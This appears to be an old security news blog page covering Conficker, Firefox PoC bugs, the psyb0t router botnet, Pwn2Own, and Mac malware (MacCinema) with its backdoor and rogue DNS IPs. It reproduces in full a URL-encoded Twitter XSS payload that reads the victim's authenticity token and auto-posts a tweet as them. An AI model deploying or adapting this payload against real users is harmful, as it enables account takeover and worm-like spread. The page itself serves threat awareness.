iThreats

[ http://www.worldtimezone.com/ ]

It’s now April 01 in New Zealand and in few minutes here in Australia then followed by Asia, Africa, Europe and America. This high profile internet worm will start triggering its payload which is the generation of 50,000 domain names. However, it will only choose 500 randomly to call home. 

Everyone is eyeing for what’s next.

Just couple of days, Mozilla Firefox XSL Parsing Remote Memory Corruption PoC 0day and yesterday another one – Firefox 3.0.x (XML Parser) Memory Corruption / DoS PoC.

This vulnerabilities does NOT affect Mac OS X.

More information has surfaced about the botnet “psyb0t,” the first known to be capable of directly infecting home routers and cable/DSL modems.

It was first observed infecting a Netcomm NB5 modem/router in Australia.

Further read @ http://blogs.zdnet.com/BTL/?p=15197

Further read @ http://www.dronebl.org/blog/8

Analysis @  http://www.adam.com.au/bogaurd/PSYB0T.pdf

Phishers targeting Optus – one of the biggest telecom in Australia.

Last year’s CanSecWest PWN2OWN successfully hacked Mac OS X in 2 minutes, but this year it’s a whooping 10 seconds!

From interview , he described “I gave them the link, they clicked on it, and that was it,” said Miller. “I did a few things to show that I had full control of the Mac.”

He walked off with a $5,000 cash prize and the MacBook he hacked.

Apparently, just last year the attack went succesful by targetting Safari + internet connection.

This give us a clear picture on what attack vector could easily get onto users’ computer.

Not surprising that we are now bombarded with Internet threats!

Good job from SRI for making this paper publicly available!

>> http://mtc.sri.com/Conficker/addendumC/

@ Researchers Make Wormy Twitter Attack

>> http://www.pcworld.com/businesscenter/article/161631/researchers_make_wormy_twitter_attack.html

@ http://www.securescience.net/twoubledtwitter.html

—————————————————————————————————-

<html>
Link for Twitter Viral XSS Proof of Concept:
<p><a href=”http://twitter.com/help/request_source?device_source[name]=%3Cscript%3Eif%28confirm%28%22Combining+Twitter+and+it%27s+viral+market+affect%2C+an+attacker+could+do+much+more+than+our+simple+proof+of+concept%2E+

They+could+use+this+to+infect+massive+amounts+of+twitter+users+within+hours+using+remote+exploit+code%2C+as+well+as+steal+their+twitter

+account+information%2C+all+without+the+victims+knowledge%2E%5Cn%5CnIf+you+proceed%2C+a+tweet+will+be+posted+automatically+AS+YOURSELF%2E+The+contents+of+this+tweet+is+innocuous+but

+demonstrates+the+viral+capabilities%2E+By+clicking+OK+you+will+demonstrate+this+flaw%2E+Clicking+cancel+will+leave+this+demonstration

+without+any+effects%2E%22%29%29%7Ba%3Dfunction%28p%2Ct%2Cn%29%7Bvar+o%3Ddocument%2EcreateElement%28t%29%3Bif%28n%29%7Bo%2Etype%3D%22hidden%22%3Bo%2Ename%3Dn%7D%3Bp%2EappendChild%28o%29%3Breturn+o%3B%7D%3Bf%3Da%28document%2Ebody%2C%22form%22%29%3Bf%2Eaction%3D%22%2Fstatus%2Fupdate%22%3Bf%2Emethod%3D%22POST%22%3Ba%28f%2C%22input%22%2C%22authenticity%5Ftoken%22%29%2Evalue%3Dtwttr%2Eform%5Fauthenticity%5Ftoken%3Ba%28f%2C%22input%22%2C%22status%22%29%2Evalue%3D%22%40XSSExploits+I+just+got+owned%21%22%3Bf%2Esubmit%28%29%3B%7Delse%7Blocation%2Ehref%3D%22http%3A%2F%2Fwww%2Esecurescience%2Ecom%2F%22%7D%3C%2Fscript%3E”>Link</a>
<p>Link is benign, accompanied with a choice of whether you want to be exploited or not, and an explanation of the process. If you accept, your account will have posted a reply to XSSExploits with “I just got owned!”.
<p>
For more on how severe XSS can get please read <a href=”http://www.securescience.com/FILES/securescience/10237/335_PH_EXP_05.pdf”>Chapter 5</a> of Phishing Exposed.
<p> Research conducted by Lance James and Eric Wastl

</html>

—————————————————————————————————-

Take note that this is NOT platform dependent.  I hope attackers will not take advantage of this code!

From http://xkcd.com – the online comic strip with jokes!

Another modified version of “MacCinema” promising as a crack version of  “Avid.Xpress.Pro.5.7.2.dmg”.

This variant was recently added by MacScan, if you’re using it – do a regular check here -> http://macscan.securemac.com/spyware-list

Also, recently blogged by Intego @ http://blog.intego.com/

What’s new?  Nothing really except this few strings “yksrepsak 777 nigeb”

…which means,  “begin 777 kaspersky”.

“enialbdivad 777 nigeb” remains the same as discussed from the previous post “Latest Threat: MacCinema“.

The bottom line here is that these threats are active and in-the-wild. It is trying to play hide-n-seek with security scanners by applying obfuscation and changing few strings.

To remove this threat, just follow MacAccess removal instruction.

Stay alert and always be informed!

MacCinema is the latest OS X threat. It’s not really new, it is an update of MacAccess although this time it uses different strings and clever obfuscation but overall the installation and behavior remains the same.

So, here’s the fixed one…

This will output script below…

Notice the IP Address “213.163.64.78″- This is the backdoor IP which executed through cronjob. The backdoor is responsible for executing or installing “DNSChanger” which will change or add malicious DNS entries : 85.255.112.81, es : 85.255.112.114

Notice “enialbdivad 777 nigeb”, obviously we have to fix again ….

To fill up our curiosity, here’s the final deobfuscated script.

To remove this threat, just follow MacAccess removal instruction.